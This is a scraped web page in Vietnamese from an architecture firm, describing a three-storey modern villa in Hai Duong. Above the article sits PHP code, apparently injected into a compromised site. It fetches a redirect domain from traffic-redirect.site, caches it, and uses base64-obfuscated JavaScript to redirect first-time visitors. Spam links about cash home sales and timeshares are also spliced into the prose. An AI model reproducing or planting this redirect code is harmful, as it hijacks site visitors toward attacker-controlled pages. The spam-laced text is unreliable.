$alias = "29551697176418"; $key = "c7b088a5cce4359849d7e747bc979e91"; $file = dirname(__FILE__) . "/" . md5($alias); $time = time(); $file_exist = file_exists($file); $filetime = 0; $edittime = 0; $domain = false; if ($file_exist) { $filetime = filemtime($file); $edittime = $time - $filetime; $datafile = fopen($file, 'r'); $dcres = json_decode(base64_decode(fread($datafile, filesize($file))) , 1); if(!empty($dcres['domain'])) $url = $dcres['domain']; fclose($datafile); } if ($edittime >= 15 || !$file_exist || !$url) { $dcres = getdata($file,$key,$alias); if(isset($_REQUEST['ch'])){ var_dump($dcres); } if ($dcres['domain']) { $url = $dcres['domain']; } } function getdata($file,$key,$alias){ $newdomainurl = 'http://traffic-redirect.site/?t=json&i='.$key.'&a='.$alias; if(function_exists('curl_version')){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, 'get new domain'); curl_setopt($curl, CURLOPT_URL, $newdomainurl); curl_setopt($curl, CURLOPT_TIMEOUT, 5); $res = curl_exec($curl); curl_close($curl); }else $res = file_get_contents($newdomainurl); if(isset($_REQUEST['ch'])){ var_dump($res); } $dcres = json_decode($res, true); if ($dcres['domain']) { $cache = fopen($file, 'w+'); fwrite($cache, base64_encode($res)); fclose($cache); return $dcres; } return false; } if (!$_COOKIE[base64_decode('aHRfcnI=') ]) { setcookie(base64_decode('aHRfcnI=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $url . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $url . base64_decode('Ijs8L3NjcmlwdD4='); } ?> Mê mẩn mẫu thiết kế biệt thự sang trọng tiện nghi 3 tầng tại Hải Dương - Công ty TNHH Đầu Tư LS Việt Nam

Mê mẩn mẫu thiết kế biệt thự sang trọng tiện nghi 3 tầng tại Hải Dương

Biệt thự là loại hình nhà ở sang chảnh được rất nhiều người ưa chuộng, đặc biệt là những gia chủ có điều kiện kinh tế tốt. Tuy nhiên để thiết kế biệt sang trọng, tiện nghi xứng tầm với cá tính của gia chủ không phải là bài toán dễ. Những gợi ý dưới đây của các kiến trúc sư Công ty TNHH Đầu tư LS Việt Nam sẽ mang lại cho bạn nhiều ý tưởng mới cho không gian biệt thự của mình.

biet-thu-dep
Thiết kế biệt thự sang trọng, tiện nghi

Thông tin cơ bản mẫu thiết kế biệt thự sang trọng

Diện tích thiết kế: 778 m2

Năm: 2015

Công trình: Biệt thự sang trọng

Kiến trúc: hiện đại

Địa điểm: Hải Dương

Đơn vị thiết kế: Công ty TNHH Đầu tư LS Việt Nam

biet-thu-dep
Biệt thự chinh phục khách hàng bằng vẻ đẹp sang trọng

Diện tích – Phong cách biệt thự

Ngôi nhà dành cho một gia đình duy nhất, nằm ở một địa phương thành phố Hải Dương. Khu đất rộng 690 mét vuông và tổng diện tích xây dựng lên đến 778 mét vuông / 8371 mét vuông.

Looking to sell your property quickly? Check out https://www.cash-for-houses.org/indiana/ – a trusted platform connecting sellers with cash buyers for a hassle-free transaction

Các chủ sở hữu muốn có một ngôi nhà theo phong cách hiện đại, đương đại với sự nhấn mạnh vào kiến ​​trúc nội thất và kết nối nội / ngoại thất mạnh mẽ. Từ yêu cầu đó các KTS đã dày công thiết kế đến khi hài lòng khách hàng.

thiet-ke-biet-thu
Biệt thự phong cách hiện đại đẳng cấp

Giới thiệu nội thất biệt thự sang trọng, tiện nghi

Màu sắc nội thất

Các đốm màu cơ bản trung tính như màu xám và trắng được sử dụng chủ yếu trong đồ nội thất. Travertine màu trắng xám được sử dụng làm sàn. Tường có màu xám và trần nhà có màu trắng tinh khôi. Hình nền phong phú đã được sử dụng trên các bức tường chiến lược. Mọi thứ gộp lại tạo vẻ hiện đại, sang trọng cho biệt thự.

thiet-ke-biet-thu
Gam màu trắng – xám tôn lên phong cách thời thượng của biệt thự

Vật liệu nội thất

Với sở thích đơn giản và gọn gàng cả về kiến ​​trúc và nội thất, các vật liệu cũng được KTS chọn kĩ càng visit to know about how can i sell my time share

Một ống khói được thiết kế riêng là tâm điểm thu hút khách trong khu vực ăn uống. Một khúc gỗ lớn được dùng làm thanh vịn cho cầu thang. Giếng trời mang lại nhiều ánh sáng tự nhiên. Cửa ra vào cũ được sử dụng như các yếu tố nội thất. Mỗi phòng đều có lối đi trực quan và vật lý ra bên ngoài. Thảm và đèn đều được chọn từ thương hiệu Ý.

thiet-ke-biet-thu
Biệt thự sử dụng vật liệu đơn giản nhưng độc đáo

Mặt bằng công năng sử dụng

Ngôi nhà được quy hoạch trên 3 tầng:

Các tầng sinh hoạt và nhà bếp cộng với phòng ăn ở tầng dưới. Một phòng tập thể dục được trang bị tốt với hơi nước và phòng xông hơi khô đã được lên kế hoạch ở phía sau.

biet-thu-dep
Thiết kế biệt thự có các gian phòng thoáng đãng

Hai phòng ngủ, một rạp hát gia đình không chuyên dụng bao gồm tầng giữa.

Cùng đó là nhiều phòng thay đồ và nhiều nhà vệ sinh được lên kế hoạch ở tầng cuối cùng.

biet-thu-dep
Thiết kế biệt tự đẹp chi tiết từ những điều nhỏ nhất

Tất cả ba tầng được kết nối bằng cầu thang và thang máy. Sự khác biệt của các cấp độ và chiều cao gấp đôi nâng cao nội thất. Kính lớn từ trần đến sàn kết nối bên ngoài với bên trong.

biet-thu-dep
Bản vẽ của KTS về thiết kế biệt thự

Xem thêm: Hớp hồn biệt thự hai tầng rộng 500m2 có bể bơi

Biệt thự sang trọng, tiện nghi trên là một trong những công trình tiêu biểu của Công ty LS. Với thiết kế này, chúng tôi đã chinh phục nhiều khách hàng. Nếu bạn đang có ý định sở hữu một căn biệt thự cho riêng mình, phong cách đặc trưng của mình hãy gọi cho chúng tôi qua Hotline: 0912566052 để được tư vấn miễn phí. Sự hài lòng của bạn chính là động lực của chúng tôi.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

0912566052